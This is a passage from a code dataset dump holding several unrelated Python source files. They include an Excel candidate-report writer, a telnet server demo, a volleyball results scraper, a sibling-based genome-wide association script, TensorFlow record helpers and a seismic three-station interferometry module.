'Edu_Others', 'Id_Proof', 'Id_Number', 'Id_Others', 'Has_Bank', 'Bank_Name', 'Bank_Acc_Number', 'Created_By', 'Created_On', 'Bank_Image', 'Id_Proof_Image', 'Candidate_Image']\n ImagePath=WebConfig.FilePath\n try:\n workbook = xlsxwriter.Workbook(path)\n\n header_format = workbook.add_format({\n 'bold': True,\n #'text_wrap': True,\n 'align': 'top',\n 'valign': 'center',\n 'fg_color': '#D7E4BC',\n 'border': 1})\n\n write_format = workbook.add_format({\n 'border': 1,\n 'align': 'top',\n 'valign': 'top'})\n\n url_format = workbook.add_format({\n 'border': 1,\n 'align': 'top',\n 'valign': 'top',\n 'font_color': 'blue',\n 'underline': 1})\n worksheet = workbook.add_worksheet('Candidate Report')\n for i in range(len(col)):\n worksheet.write(0,i ,col[i], header_format) \n for j in range(len(data)) : \n for k in range(len(col)-3):\n worksheet.write(j+1,k ,data.iloc[j,k],write_format) \n for l in range(k+1,len(col)):\n if data.iloc[j,l]==None or data.iloc[j,l]=='':\n worksheet.write(j+1,l ,'NA',write_format)\n else:\n worksheet.write_url(j+1,l,ImagePath+data.iloc[j,l], url_format, string='Image', tip='Click to open image')\n \n \n workbook.close()\n except Exception as e:\n #filename='Error creating excel '+ str(e)\n print(str(e))\n \n return filename\n\n","sub_path":"Models/Report.py","file_name":"Report.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"66952742","text":"import gevent, gevent.server\nfrom telnetsrv.green import TelnetHandler, command\n\nclass MyTelnetHandler(TelnetHandler):\n WELCOME = \"Welcome to my server.\"\n\n @command(['echo', 'copy', 'repeat'])\n def command_echo(self, params):\n '''\n Echo text back to the console.\n\n '''\n self.writeresponse( ' '.join(params) )\n\n @command('timer')\n def command_timer(self, params):\n '''

\\s+\\s+
(.*?)<\\/a><\\/figcaption>\\s+
\\s+\\s+(.*?)\\s+(.*?)\\s+(.*?)',\n flags = re.M)\n p = re.findall(pattern, r.text)\n return p\n\nif __name__ == \"__main__\":\n url = 'http://www.volleyball.world/en/vnl/women/results-and-ranking/round1'\n result = crawler(url)\n print(result)\n","sub_path":"用Python玩转数据/2.1/2.1 Practice4.py","file_name":"2.1 Practice4.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"332094178","text":"#!/well/kong/users/wiw765/anaconda2/bin/python\nimport numpy as np\nimport numpy.ma as ma\nfrom pysnptools.snpreader import Bed, Pheno\nfrom scipy.stats import zscore\nfrom sibreg import sibreg\nimport h5py, argparse\n\ndef read_covariates(covar_file,ids_to_match,missing):\n## Read a covariate file and reorder to match ids_to_match ##\n # Read covariate file\n covar_f = Pheno(covar_file, missing=missing).read()\n ids = covar_f.iid\n # Get covariate values\n n_X=covar_f._col.shape[0]+1\n X=np.ones((covar_f.val.shape[0],n_X))\n X[:, 1:n_X] = covar_f.val\n # Get covariate names\n X_names = np.zeros((n_X), dtype='S10')\n X_names[0] = 'Intercept'\n X_names[1:n_X] = np.array(covar_f._col, dtype='S20')\n # Remove NAs\n NA_rows = np.isnan(X).any(axis=1)\n n_NA_row = np.sum(NA_rows)\n if n_NA_row>0:\n print('Number of rows removed from covariate file due to missing observations: '+str(np.sum(NA_rows)))\n X = X[~NA_rows]\n ids = ids[~NA_rows]\n id_dict = {}\n for i in range(0,ids.shape[0]):\n id_dict[ids[i,1]] = i\n # Match with pheno_ids\n common_ids = id_dict.viewkeys() & set(ids_to_match[:,1])\n pheno_in = np.array([x in common_ids for x in ids_to_match[:,1]])\n match_ids = ids_to_match[pheno_in,1]\n X_id_match = np.array([id_dict[x] for x in match_ids])\n X = X[X_id_match, :]\n return [X,X_names,pheno_in]\n\n######### Command line arguments #########\nif __name__ == '__main__':\n parser=argparse.ArgumentParser()\n parser.add_argument('sibgts',type=str,help='Path to bed file with sibling genotypes')\n parser.add_argument('pargts', type=str, help='Path to HDF5 file with imputed parental genotypes')\n parser.add_argument('sibped',type=str,help='Path to pedigree file with siblings sharing a family ID and non-siblings not')\n parser.add_argument('phenofile',type=str,help='Location of the phenotype file')\n parser.add_argument('outprefix',type=str,help='Location to output association statistic hdf5 file')\n parser.add_argument('--covar',type=str,help='Location of covariate file (default None)',\n default=None)\n parser.add_argument('--fit_covariates',action='store_true',\n help='Fit covariates for each locus. Default is to fit for null model and project out (mean) and rescale (variance)',\n default=False)\n parser.add_argument('--tau_init',type=float,help='Initial value for ratio between shared family environmental variance and residual variance',\n default=1)\n parser.add_argument('--phen_index',type=int,help='If the phenotype file contains multiple phenotypes, which phenotype should be analysed (default 1, first)',\n default=1)\n parser.add_argument('--min_maf',type=float,help='Ignore SNPs with minor allele frequency below min_maf (default 0.01)',default=0.01)\n parser.add_argument('--missing_char',type=str,help='Missing value string in phenotype file (default NA)',default='NA')\n parser.add_argument('--max_missing',type=float,help='Ignore SNPs with greater percent missing calls than max_missing (default 5)',default=5)\n parser.add_argument('--append',action='store_true',default=False,help='Append results to existing output file with given outprefix (default overwrites existing')\n parser.add_argument('--no_covariate_estimates',action='store_true',default=False,help='Suppress output of covariate effect estimates')\n parser.add_argument('--no_sib',action='store_true',default=False,help='Do not fit indirect genetic effects from sibs')\n parser.add_argument('--fit_VC', action='store_true', default=False,\n help='Fit the variance components for each SNP (default is to use null model MLE)')\n args=parser.parse_args()\n\n ####################### Read in data #########################\n #### Read phenotype ###\n pheno = Pheno(args.phenofile, missing=args.missing_char).read()\n # pheno = Pheno('phenotypes/eduyears_resid.ped', missing='NA').read()\n y = np.array(pheno.val)\n pheno_ids = np.array(pheno.iid)\n if y.ndim == 1:\n pass\n elif y.ndim == 2:\n y = y[:, args.phen_index - 1]\n else:\n raise (ValueError('Incorrect dimensions of phenotype array'))\n # Remove y NAs\n y_not_nan = np.logical_not(np.isnan(y))\n if np.sum(y_not_nan) < y.shape[0]:\n y = y[y_not_nan]\n pheno_ids = pheno_ids[y_not_nan, :]\n pheno_id_dict = {}\n for i in xrange(0, y.shape[0]):\n pheno_id_dict[pheno_ids[i, 1]] = i\n pheno_fams = set(pheno_ids[:, 0])\n print('Number of non-missing phenotype observations: ' + str(y.shape[0]))\n\n ### Get covariates\n ## Get mean covariates\n if not args.covar == None:\n X, X_names, pheno_in = read_covariates(args.covar, pheno_ids, args.missing_char)\n n_X = X.shape[1]\n # Remove rows with missing values\n if np.sum(pheno_in) < y.shape[0]:\n y = y[pheno_in]\n pheno_ids = pheno_ids[pheno_in, :]\n # Normalise non-constant cols\n X_stds = np.std(X[:, 1:n_X], axis=0)\n X[:, 1:n_X] = zscore(X[:, 1:n_X], axis=0)\n else:\n X = np.ones((int(y.shape[0]), 1))\n n_X = 1\n X_names = np.array(['Intercept'])\n\n ### Read pedigree file ###\n ### Load pedigree\n ped = np.loadtxt(args.sibped, dtype='S20', skiprows=1)\n\n ### Create family dictionary\n fams = {}\n fam_ids = np.unique(ped[:, 0])\n for f in fam_ids:\n fams[f] = tuple(ped[ped[:, 0] == f, 1])\n # reverse lookup dict\n sib_fam_dict = {}\n for i in xrange(0, ped.shape[0]):\n sib_fam_dict[ped[i, 1]] = ped[i, 0]\n\n ### Read imputed parental genotypes ###\n print('Reading imputed parental genotype file')\n pargts_f = h5py.File(args.pargts, 'r')\n # get families\n par_fams = np.array(pargts_f['families'])\n # build family dictionary\n par_fam_dict = {}\n for i in range(0, par_fams.shape[0]):\n par_fam_dict[par_fams[i]] = i\n pargts = np.array(pargts_f['imputed_par_gts'])\n par_sid = np.array(pargts_f['sid'])\n par_sid_dict = {}\n for i in range(0, par_sid.shape[0]):\n par_sid_dict[par_sid[i]] = i\n\n pargts_f.close()\n\n ### Read sibling genotype file ###\n #### Load genotypes\n gts_f = Bed(args.sibgts)\n gts_ids = gts_f.iid\n # Build dict\n id_dict = {}\n for i in xrange(0, gts_ids.shape[0]):\n id_dict[gts_ids[i, 1]] = i\n sid = gts_f.sid\n sid_length = sid.shape[0]\n sid_dict = {}\n for i in range(0, sid.shape[0]):\n sid_dict[sid[i]] = i\n\n ### Identify siblings without genotyped parents\n # Remove individuals with genotyped parents\n parent_genotyped = np.array([ped[i, 2] in id_dict or ped[i, 3] in id_dict for i in range(0, ped.shape[0])])\n ped = ped[np.logical_not(parent_genotyped), :]\n ped_fams = np.unique(ped[:, 0])\n sibships = {}\n sibship_indices = []\n for f in ped_fams:\n pedf = ped[ped[:, 0] == f, :]\n parent_pairs = np.array([pedf[x, 2] + pedf[x, 3] for x in range(0, pedf.shape[0])])\n unique_parent_pairs = np.unique(parent_pairs)\n pcount = 0\n for par in unique_parent_pairs:\n pmatch = parent_pairs == par\n if np.sum(pmatch) > 1:\n sibs = pedf[pmatch, 1]\n sibs_genotyped = np.array([x in id_dict for x in sibs])\n if np.sum(sibs_genotyped) > 1:\n sibships[f] = sibs[sibs_genotyped]\n sibship_indices = sibship_indices + [id_dict[x] for x in sibs[sibs_genotyped]]\n pcount += 1\n if pcount > 1:\n print('More than one sibship without genotyped parents in family ' + str(\n f) + '. Implies incorrect/unsupported pedigree.')\n\n sibship_indices = np.sort(np.unique(np.array(sibship_indices)))\n\n ### Match SIDs of sibling and par gts ###\n in_par_sid = np.zeros((sid.shape[0]), dtype=bool)\n par_sid_indices = []\n for s in range(0, sid.shape[0]):\n sid_s = sid[s]\n if sid_s in par_sid_dict:\n in_par_sid[s] = True\n par_sid_indices.append(par_sid_dict[sid_s])\n sid = sid[in_par_sid]\n pargts = pargts[:,par_sid_indices]\n par_sid = par_sid[par_sid_indices]\n\n # Read sibling genotypes\n if (np.sum(in_par_sid)*gts_ids.shape[0])<(sibship_indices.shape[0]*sid_length):\n gts = gts_f[:, in_par_sid].read().val\n gts = ma.array(gts, mask=np.isnan(gts), dtype=int)\n gts = gts[sibship_indices,:]\n else:\n gts = gts_f[sibship_indices, :].read().val\n gts = ma.array(gts, mask=np.isnan(gts), dtype=int)\n gts = gts[:, in_par_sid]\n pos = gts_f.pos[in_par_sid, 2]\n\n # rebuild ID dictionary\n gts_ids = gts_ids[sibship_indices, :]\n # Build dict\n id_dict = {}\n for i in xrange(0, gts_ids.shape[0]):\n id_dict[gts_ids[i, 1]] = i\n\n ### Construct genetic covariate matrix\n print('Forming family-wise genotype matrix')\n if args.no_sib:\n gsize = 2\n else:\n gsize = 3\n G = ma.array(np.zeros((gts.shape[0], gsize, gts.shape[1]), dtype=np.float32),\n mask=np.zeros((gts.shape[0], gsize, gts.shape[1]), dtype=bool))\n y_new = np.zeros((sibship_indices.shape[0]))\n y_new[:] = np.nan\n X_new = np.zeros((sibship_indices.shape[0], X.shape[1]))\n X_new[:] = np.nan\n fam_labels = np.zeros((sibship_indices.shape[0]), dtype='S20')\n G[:, 0, :] = gts\n for i in xrange(0, sibship_indices.shape[0]):\n fam_i = sib_fam_dict[gts_ids[i, 1]]\n fam_labels[i] = fam_i\n # Find siblings\n if not args.no_sib:\n sibs_i = sibships[fam_i]\n sibs_i = np.delete(sibs_i, np.where(sibs_i == gts_ids[i, 1])[0][0])\n sibs_i = np.array([id_dict[x] for x in sibs_i])\n G[i, 1, :] = ma.mean(gts[sibs_i, :], axis=0)\n # Get imputed parental genotype\n G[i, gsize - 1, :] = pargts[par_fam_dict[fam_i], :]\n G.mask[i, gsize - 1, :] = np.isnan(pargts[par_fam_dict[fam_i], :])\n # Get phenotype\n if gts_ids[i, 1] in pheno_id_dict:\n pindex = pheno_id_dict[gts_ids[i, 1]]\n y_new[i] = y[pindex]\n X_new[i, :] = X[pindex, :]\n\n del gts\n del pargts\n y = y_new\n X = X_new\n\n y_not_nan = np.logical_not(np.isnan(y))\n y = y[y_not_nan]\n X = X[y_not_nan, :]\n G = G[y_not_nan, :]\n fam_labels = fam_labels[y_not_nan]\n\n print(str(y.shape[0]) + ' genotyped individuals with phenotype data and imputed parental genotyped')\n\n ######### Initialise output files ######\n######### Fit Null Model ##########\n ## Get initial guesses for null model\n print('Fitting Null Model')\n # Optimize null model\n sigma_2_init = np.var(y)*args.tau_init/(1+args.tau_init)\n null_model = sibreg.model(y, X, fam_labels)\n null_optim = null_model.optimize_model(np.array([sigma_2_init,args.tau_init]))\n print('Within family variance estimate: '+str(round(null_optim['sigma2']/null_optim['tau'],4)))\n print('Residual variance estimate: ' + str(round(null_optim['sigma2'],4)))\n null_alpha = null_model.alpha_mle(null_optim['tau'],null_optim['sigma2'],compute_cov = True)\n ## Record fitting of null model\n if not args.append and not args.no_covariate_estimates and args.covar is not None:\n # Get print out for fixed mean effects\n alpha_out = np.zeros((n_X, 2))\n alpha_out[:, 0] = null_alpha[0]\n alpha_out[:, 1] = np.sqrt(np.diag(null_alpha[1]))\n # Rescale\n if n_X > 1:\n for i in xrange(0, 2):\n alpha_out[1:n_X, i] = alpha_out[1:n_X, i] / X_stds\n np.savetxt(args.outprefix + '.null_covariate_effects.txt',\n np.hstack((X_names.reshape((n_X, 1)), np.array(alpha_out, dtype='S20'))),\n delimiter='\\t', fmt='%s')\n\n # Fit SNP specific models\n ### Project out mean covariates\n if not args.fit_covariates:\n # Residual y\n y=y-X.dot(null_alpha[0])\n # Reformulate fixed_effects\n X=np.ones((X.shape[0],1))\n n_X=1\n\n ## Output file\n outfile = h5py.File(args.outprefix+'.hdf5','w')\n outfile['sid'] = sid\n if args.no_sib:\n X_length = n_X + 2\n else:\n X_length = n_X + 3\n outfile.create_dataset('xtx',(G.shape[2],X_length,X_length),dtype = 'f',chunks = True, compression = 'gzip', compression_opts=9)\n outfile.create_dataset('xty', (G.shape[2], X_length), dtype='f', chunks=True, compression='gzip',\n compression_opts=9)\n\n ############### Loop through loci and fit models ######################\n print('Fitting models for genome-wide SNPs')\n # Optimize model for SNP\n freqs = ma.mean(G[:,0,:],axis=0)/2.0\n missingness = ma.mean(G.mask[:,0,:],axis=0)\n N_L = np.zeros((G.shape[2]), dtype=int)\n for loc in xrange(0,G.shape[2]):\n if freqs[loc] > args.min_maf and freqs[loc] < (1-args.min_maf) and (100*missingness[loc]) < args.max_missing:\n # Find NAs\n not_nans = np.sum(G[:, :, loc].mask, axis=1) == 0\n n_l = np.sum(not_nans)\n N_L[loc] = n_l\n X_l = np.ones((n_l, X_length), dtype=np.float64)\n X_l[:, 0:n_X] = X[not_nans, :]\n X_l[:, n_X:X_length] = G[not_nans, :, loc]\n model_l = sibreg.model(y[not_nans], X_l, fam_labels[not_nans])\n if args.fit_VC:\n optim_l = model_l.optimize_model(np.array([null_optim['sigma2'], null_optim['tau']]))\n if optim_l['success']:\n alpha_l = model_l.alpha_mle(optim_l['tau'], optim_l['sigma2'], compute_cov=True, xtx_out= True)\n else:\n raise(ValueError('Maximisation of likelihood failed for for ' + sid[loc]))\n else:\n alpha_l = model_l.alpha_mle(null_optim['tau'], null_optim['sigma2'], compute_cov=True, xtx_out= True)\n outfile['xtx'][loc,:,:] = alpha_l[0]\n outfile['xty'][loc,:] = alpha_l[1]\n else:\n outfile['xtx'][loc, :, :] = np.nan\n outfile['xty'][loc, :] = np.nan\n outfile['sigma2'] = null_optim['sigma2']\n outfile['tau'] = null_optim['tau']\n outfile['N_L'] = N_L\n outfile['freqs'] = freqs\n outfile.close()","sub_path":"sibreg/bin/pGWAS.py","file_name":"pGWAS.py","file_ext":"py","file_size_in_byte":14249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"379692385","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport tensorflow as tf\n\n\ndef serialize(label, tokens, length, weight):\n seq = tf.train.SequenceExample()\n\n seq.context.feature['label'].int64_list.value.append(label)\n seq.context.feature['length'].int64_list.value.append(length)\n seq.context.feature['weight'].int64_list.value.append(weight)\n\n _tokens = seq.feature_lists.feature_list['tokens']\n for t in tokens:\n _tokens.feature.add().int64_list.value.append(t)\n return seq.SerializeToString()\n\n\ndef write_records(path, labels, inputs, lengths, weights):\n writer = tf.python_io.TFRecordWriter(path)\n for label, tokens, length, weight in zip(labels, inputs, lengths, weights):\n writer.write(serialize(label, tokens, length, weight))\n writer.close()\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"566796858","text":"# -*- coding: utf-8 -*-\n\"\"\"\ninternal functions and classes for three station interferometry\n\n:Copyright:\n Author: Lili Feng\n email: lfeng1011@gmail.com\n\"\"\"\nimport surfpy.aftan.pyaftan as pyaftan\n\nimport numpy as np\nfrom numba import jit, float32, int32, boolean, float64, int64\nimport numba\nimport pyfftw\nimport obspy\nimport os\nimport multiprocessing\nimport obspy\nimport obspy.signal.filter\nimport scipy.signal\nimport glob\nimport time\n\n\n@numba.jit(numba.types.Tuple((numba.float32[:], numba.int64[:], numba.int64, numba.int64, numba.int64))\\\n (numba.int64, numba.float32[:], numba.float32[:], numba.float32), nopython=True)\ndef _trigger(nf, phvel, om , tresh):\n \"\"\"Detect jumps in dispersion curve\n \"\"\"\n hh1 = om[1:nf-1] - om[:nf-2]\n hh2 = om[2:] - om[1:nf-1]\n hh3 = hh1 + hh2\n r = (phvel[:nf-2]/hh1 - (1./hh1+1/hh2)*phvel[1:nf-1] + phvel[2:]/hh2)*hh3/4.*100.\n ftrig = np.zeros(nf, dtype=np.float32)\n ftrig[1:nf-1] = r\n # second derivative\n ftrig[:-1] = ftrig[:-1] - ftrig[1:]\n trig = np.zeros(nf, dtype=np.int64)\n ierr = 0\n for i in range(nf):\n if i == 0: continue\n if i == (nf-1): break\n if ftrig[i] > tresh:\n trig[i] = 1\n ierr = 1\n elif ftrig[i] < -tresh:\n trig[i] = -1\n ierr = 1\n ist = 0\n ibe = 0\n # determine the longest length\n if ierr != 0:\n for k in range(nf):\n if trig[k] != 0:\n if (k - ibe) > (ibe - ist):\n ist = ibe\n ibe = k\n else:\n if k == (nf - 1):\n if (k - ibe) > (ibe - ist):\n ist = ibe\n ibe = k\n return ftrig, trig, ierr, ist, ibe\n\n@numba.jit(numba.types.Tuple((numba.int64, numba.int64))(numba.int64[:]), nopython=True)\ndef _get_pers_ind(Nm):\n \"\"\"Detect jumps in dispersion curve\n \"\"\"\n nf = Nm.size\n ind0= np.where(Nm == 0)[0]\n ist = 0\n ibe = 0\n for i in range(ind0.size):\n if i == 0:\n ist = 0\n ibe = ind0[i] - 1\n continue\n if (ind0[i] - ind0[i-1]) > (ibe - ist):\n ist = ind0[i-1] + 1\n ibe = ind0[i] - 1 \n if (nf - 1 - ind0[-1]) > (ibe - ist):\n ist = ind0[-1] + 1\n ibe = nf - 1 \n return ist, ibe\n\ndef _tshift_fft(data, dt, pers, phvel, iphase, d):\n \"\"\"positive means delaying the waveform\n \"\"\"\n npts = data.size\n Np2 = int(max(1<<(npts-1).bit_length(), 2**12))\n Xf = np.fft.rfft(data, n=Np2)\n freq = 1./dt/Np2*np.arange((Np2/2+1), dtype = float)\n infreq = 1./pers[::-1]\n fitp = scipy.interpolate.interp1d(infreq, phvel[::-1], kind='linear', fill_value='extrapolate', assume_sorted=True )\n C = fitp(freq)\n # d < 0 : wave arrives earlier than expected, need to shift to right, tshift = -d/C > 0.\n # d > 0 : vice versa\n tshift = -d/C \n ph_shift= np.exp(-2j*np.pi*freq*tshift - 1j*iphase)\n Xf2 = Xf*ph_shift\n return np.real(np.fft.irfft(Xf2)[:npts])\n\nclass c3_pair(object):\n \"\"\" A class for ambient noise three station interferometry\n =================================================================================================================\n ::: parameters :::\n stacode1, netcode1 - station/network code for station 1\n stacode2, netcode2 - station/network code for station 2\n \n =================================================================================================================\n \"\"\"\n def __init__(self, datadir, outdir, stacode1, netcode1, stla1, stlo1, stacode2, netcode2, stla2, stlo2,\\\n channel, chan_types= [], StationInv = [], alpha = 0.01, vmin = 1., vmax = 5., Tmin = 5.,\\\n Tmax = 150., bfact_dw = 1., efact_dw = 1., dthresh = 5., inftan = pyaftan.InputFtanParam(), \\\n basic1=True, basic2=True, pmf1=True, pmf2=True, f77=True, prephdir='', pers = [],\\\n snr_thresh = 10., Ntrace_min = 5, nfmin = 5, jump_thresh = 3., phvel_ref = [], pers_ref = [], prefer_c3_disp = True):\n self.datadir = datadir\n self.outdir = outdir\n self.stacode1 = stacode1\n self.netcode1 = netcode1\n self.stla1 = stla1\n self.stlo1 = stlo1\n self.stacode2 = stacode2\n self.netcode2 = netcode2\n self.stla2 = stla2\n self.stlo2 = stlo2\n self.channel = channel\n self.chan_types = chan_types # not used for now\n self.StationInv = StationInv\n # parameters for interferometry data processing\n self.alpha = alpha\n self.vmin = vmin\n self.vmax = vmax\n self.Tmin = Tmin\n self.Tmax = Tmax\n self.bfact_dw = bfact_dw\n self.efact_dw = efact_dw\n self.dthresh = dthresh\n # parameters for aftan\n self.inftan = inftan\n self.basic1 = basic1\n self.basic2 = basic2\n self.pmf1 = pmf1\n self.pmf2 = pmf2\n self.f77 = f77\n self.prephdir = prephdir\n if len(pers) == 0:\n self.pers = np.append( np.arange(18.)*2.+6., np.arange(4.)*5.+45.)\n else:\n self.pers = pers\n # aftan stack\n self.snr_thresh = snr_thresh \n self.nfmin = nfmin\n self.Ntrace_min = Ntrace_min\n self.jump_thresh= jump_thresh\n # reference dispersion curves, used for phase correction\n if len(phvel_ref) != len(pers_ref):\n raise ValueError('length of refernce phase speed and periods must be consistent')\n self.phvel_ref = phvel_ref\n self.pers_ref = pers_ref\n self.prefer_c3_disp = prefer_c3_disp\n return\n \n def print_info(self, process_id):\n \"\"\"print the informations of this pair\n \"\"\"\n staid1 = self.netcode1 + '.' + self.stacode1\n staid2 = self.netcode2 + '.' + self.stacode2\n print ('--- '+ staid1+'_'+staid2+' processID = '+str(process_id))\n \n def direct_wave_interfere(self, process_id= '', verbose = False, verbose2= False):\n \"\"\"direct wave interferometry\n \"\"\"\n if verbose:\n self.print_info(process_id=process_id)\n chan1 = self.channel[0]\n chan2 = self.channel[1]\n dist0, az0, baz0= obspy.geodetics.gps2dist_azimuth(self.stla1, self.stlo1, self.stla2, self.stlo2)\n dist0 /= 1000.\n staid1 = self.netcode1 + '.' + self.stacode1\n staid2 = self.netcode2 + '.' + self.stacode2\n xcorrpattern = self.datadir + '/COR/'+staid1+'/COR_'+staid1+'_??'+chan1+'_'+staid2+'_??'+chan2+'.SAC'\n if len(glob.glob(xcorrpattern)) > 0:\n outdir = self.outdir + '/SYNC_C3/'+staid1\n else:\n outdir = self.outdir + '/ASYNC_C3/'+staid1\n Ntraces = 0\n # loop over source stations\n for srcnet in self.StationInv:\n for srcsta in srcnet:\n sourceid = srcnet.code+'.'+srcsta.code\n if sourceid == staid1 or sourceid == staid2:\n continue\n evla = srcsta.latitude\n evlo = srcsta.longitude\n dist1, az1, baz1= obspy.geodetics.gps2dist_azimuth(evla, evlo, self.stla1, self.stlo1)\n dist2, az2, baz2= obspy.geodetics.gps2dist_azimuth(evla, evlo, self.stla2, self.stlo2)\n dist1 /= 1000.\n dist2 /= 1000.\n dhyp = dist0 - abs(dist1 - dist2)\n dell = dist1 + dist2 - dist0\n if abs(dhyp - dell) < self.dthresh:\n if verbose2:\n print ('!!! SKIP c3: %s_%s source: %s' %(staid1, staid2, sourceid))\n continue\n # not in stationary phase zone\n if min(dhyp, dell) > dist0*self.alpha:\n continue\n if dell < dhyp:\n iellhyp = 1\n else:\n iellhyp = 2\n # load xcorr data\n # station 1\n if staid1 < sourceid:\n datadir1 = self.datadir + '/COR/'+staid1\n fpattern1 = datadir1 + '/COR_'+staid1+'_??'+chan1+'_'+sourceid+'_??'+chan1+'.SAC'\n else:\n datadir1 = self.datadir + '/COR/'+sourceid\n fpattern1 = datadir1 + '/COR_'+sourceid+'_??'+chan1+'_'+staid1+'_??'+chan1+'.SAC'\n flst1 = glob.glob(fpattern1)\n if len(flst1) == 0:\n continue\n fname1 = flst1[0]\n # station 2\n if staid2 < sourceid:\n datadir2 = self.datadir + '/COR/'+staid2\n fpattern2 = datadir2 + '/COR_'+staid2+'_??'+chan2+'_'+sourceid+'_??'+chan2+'.SAC'\n else:\n datadir2 = self.datadir + '/COR/'+sourceid\n fpattern2 = datadir2 + '/COR_'+sourceid+'_??'+chan2+'_'+staid2+'_??'+chan2+'.SAC'\n flst2 = glob.glob(fpattern2)\n if len(flst2) == 0:\n continue\n fname2 = flst2[0]\n # load data, get symmetric components\n tr1 = obspy.read(fname1)[0]\n outsactr = obspy.io.sac.SACTrace.from_obspy_trace(tr1.copy())\n tr1 = pyaftan.aftantrace(tr1.data, tr1.stats)\n tr1.makesym()\n tr2 = obspy.read(fname2)[0]\n tr2 = pyaftan.aftantrace(tr2.data, tr2.stats)\n tr2.makesym()\n if abs(tr1.stats.delta - tr2.stats.delta) > min(tr1.stats.delta/1000., tr2.stats.delta/1000.):\n raise AttributeError('!!! xcorr must have the same sampling rate!')\n if iellhyp == 1:\n outdata = scipy.signal.convolve(tr1.data, tr2.data, mode='full', method='fft')\n else:\n outdata = scipy.signal.correlate(tr1.data, tr2.data, mode='full', method='fft')\n # data\n outsactr.data = outdata\n #==================\n # update headers\n #==================\n if iellhyp == 1:\n outsactr.b += tr1.stats.sac.e\n outsactr.kuser0 = self.netcode1\n outsactr.kevnm = self.stacode1\n outsactr.knetwk = self.netcode2\n outsactr.kstnm = self.stacode2\n outsactr.evla = self.stla1\n outsactr.evlo = self.stlo1\n outsactr.stla = self.stla2\n outsactr.stlo = self.stlo2\n outsactr.dist = dist0\n outsactr.az = az0\n outsactr.baz = baz0\n # source station\n outsactr.kuser1 = srcnet.code\n outsactr.kuser2 = srcsta.code\n if iellhyp == 1:\n outsactr.user0 = dell\n else:\n outsactr.user0 = -dhyp\n outsactr.user1 = srcsta.latitude\n outsactr.user2 = srcsta.longitude\n outsactr.kcmpnm = self.channel\n # save data\n if not os.path.isdir(outdir):\n try:\n os.makedirs(outdir)\n except OSError:\n i = 0\n while(i < 10):\n sleep_time = np.random.random()/10.\n time.sleep(sleep_time)\n if not os.path.isdir(outdir):\n try:\n os.makedirs(outdir)\n break\n except OSError:\n pass\n i += 1\n if iellhyp == 1:\n outfname= outdir + '/C3_'+ staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_'+sourceid+'_ELL.SAC'\n else:\n outfname= outdir + '/C3_'+ staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_'+sourceid+'_HYP.SAC'\n outsactr.write(outfname)\n Ntraces += 1\n return Ntraces\n \n def direct_wave_aftan(self, process_id= '', verbose = False):\n \"\"\"direct wave aftan\n \"\"\"\n inftan = self.inftan\n if verbose:\n self.print_info(process_id = process_id)\n chan1 = self.channel[0]\n chan2 = self.channel[1]\n staid1 = self.netcode1 + '.' + self.stacode1\n staid2 = self.netcode2 + '.' + self.stacode2\n if not os.path.isdir(self.datadir + '/logs_dw_aftan/'+ staid1):\n try:\n os.makedirs(self.datadir + '/logs_dw_aftan/'+ staid1)\n except OSError:\n i = 0\n while(i < 10):\n sleep_time = np.random.random()/10.\n time.sleep(sleep_time)\n if not os.path.isdir(self.datadir + '/logs_dw_aftan/'+ staid1):\n try:\n os.makedirs(self.datadir + '/logs_dw_aftan/'+ staid1)\n break\n except OSError:\n pass\n i += 1\n logfname = self.datadir + '/logs_dw_aftan/'+ staid1 + '/' + staid1 +'_'+staid2+'.log'\n with open(logfname, 'w') as fid:\n fid.writelines('RUNNING\\n')\n if len(glob.glob(self.datadir + '/SYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*ELL.SAC')) > 0 or \\\n len(glob.glob(self.datadir + '/SYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*HYP.SAC')) > 0:\n is_sync = True\n elif len(glob.glob(self.datadir + '/ASYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*ELL.SAC')) > 0 or \\\n len(glob.glob(self.datadir + '/ASYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*HYP.SAC')) > 0:\n is_sync = False\n else:\n with open(logfname, 'w') as fid:\n fid.writelines('NODATA\\n')\n return \n dist0, az0, baz0= obspy.geodetics.gps2dist_azimuth(self.stla1, self.stlo1, self.stla2, self.stlo2)\n dist0 /= 1000.\n if is_sync:\n ellflst = glob.glob(self.datadir + '/SYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*ELL.SAC')\n hyplst = glob.glob(self.datadir + '/SYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*HYP.SAC')\n else:\n ellflst = glob.glob(self.datadir + '/ASYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*ELL.SAC')\n hyplst = glob.glob(self.datadir + '/ASYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*HYP.SAC')\n # source station in elliptical stationary phase zone\n ell_piover4 = -2.\n for ellfname in ellflst:\n elltr = obspy.read(ellfname)[0]\n ell_atr = pyaftan.aftantrace(elltr.data, elltr.stats)\n ell_atr.stats.sac.dist = dist0 + ell_atr.stats.sac.user0 # distance correction\n phvelname = self.prephdir + \"/%s.%s.pre\" %(staid1, staid2)\n if not os.path.isfile(phvelname):\n print ('*** WARNING: '+ phvelname+' not exists!')\n continue\n # aftan analysis\n if self.f77:\n ell_atr.aftanf77(pmf=inftan.pmf, piover4 = ell_piover4, vmin=inftan.vmin, vmax=inftan.vmax, tmin=inftan.tmin, tmax=inftan.tmax,\n tresh=inftan.tresh, ffact=inftan.ffact, 